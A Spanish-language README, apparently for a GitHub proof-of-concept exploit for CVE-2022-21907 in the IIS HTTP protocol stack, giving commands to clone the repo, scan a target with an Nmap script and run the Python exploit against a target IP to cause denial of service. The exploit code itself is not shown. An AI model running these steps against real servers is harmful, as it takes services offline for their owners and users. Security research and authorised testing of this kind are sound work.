
Exploit de prueba de concepto para CVE-2022-21907, una vulnerabilidad de ejecución remota de código en la pila del protocolo HTTP (IIS). Incluye un script de Python y un script de Nmap para detección y explotación.
⚠️ Solo con fines educativos y de investigación de seguridad autorizada
Muy agradecidos al autor original del PoC NU11SECURITY y a michelep
Vulnerabilidad de ejecución remota de código en la pila del protocolo HTTP. Esta vulnerabilidad provocaría un ataque de denegación de servicio (DoS) contra un sistema objetivo que tenga un servidor web IIS.
Instale git y luego clone el PoC desde el repositorio de GitHub:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
Instale los requisitos usando el comando pip3:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
Compruebe la presencia de la vulnerabilidad en la máquina objetivo usando el comando:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
A continuación, ejecute los scripts del PoC usando el comando:
python3 CVE-2022-21907.py -i 10.10.1.10
Notas: especifique la opción -i con la dirección IP del objetivo